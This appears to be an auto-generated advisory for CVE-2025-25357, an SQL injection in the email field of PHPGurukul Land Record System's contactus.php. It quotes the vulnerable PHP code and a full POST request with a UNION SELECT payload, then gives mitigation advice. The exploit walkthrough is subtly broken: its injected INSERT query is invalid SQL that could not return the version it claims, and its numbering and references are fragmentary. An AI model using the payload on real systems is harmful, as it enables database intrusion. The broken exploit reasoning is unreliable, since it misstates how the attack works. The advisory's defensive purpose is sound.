CVE-2025-25357 - SQL Injection vulnerability uncovered in PHPGurukul Land Record System v1.

---

Overview

Recently, a critical vulnerability has been discovered in PHPGurukul Land Record System v1., which is widely used software for managing land records and related data. This vulnerability is an instance of SQL Injection and has been assigned the CVE ID CVE-2025-25357. An attacker could potentially exploit this vulnerability to execute arbitrary code, leading to unauthorized access, data leakage or even a compromise of the entire system.

In this article, we will discuss the details of this vulnerability, including a walk-through of example exploits, references to the original sources and advice on how to mitigate the risk.

Vulnerability Details

The vulnerability resides in the /admin/contactus.php file of PHPGurukul Land Record System v1. and affects the email POST request parameter. An attacker can insert malicious data in this parameter which could, in turn, manipulate the SQL query and access sensitive data from the underlying database or execute arbitrary code.

Here is a snippet from the vulnerable code section

$email = $_POST['email'];
$query = "INSERT INTO contactus(name,email,subject,message) VALUES('$name', '$email','$subject','$message')";
$result = mysqli_query($con, $query);

This code allows user input to be directly passed into an SQL query without any input validation or proper parameterization, making it vulnerable to SQL injection.

The attacker sends a malicious POST request, including a specially crafted email value

POST /admin/contactus.php HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded

email=test@example.com' UNION SELECT 1,2,3,@@version -- -&name=test&subject=test&message=test

The SQL query would then look like this

INSERT INTO contactus(name,email,subject,message) VALUES('test', 'test@example.com' UNION SELECT 1,2,3,@@version -- -','test','test')

3. The attacker has now successfully injected an additional SQL query, SELECT statement, revealing the database version, which could potentially be leveraged to carry out further exploits.

Here are the original references for further information

1. Vulnerability Description from NVD
2. PHPGurukul Land Record System Official Website

Mitigation Steps

In order to mitigate and protect against this vulnerability, users should undertake the following actions:

Ensure proper parameterization is used in SQL queries to avoid SQL injection attacks.

4. Keep regular backups of your system and important files to ensure you have a recovery point in case of a compromise.

Conclusion

CVE-2025-25357 exposes a dangerous flaw in the PHPGurukul Land Record System v1., which could result in severe consequences if left unaddressed. It is crucial for users to be vigilant when dealing with user-supplied data and to incorporate best practices when it comes to secure coding and design to minimize the risk of vulnerabilities.

Timeline

Published on: 02/13/2025 16:16:49 UTC
Last modified on: 02/14/2025 19:38:15 UTC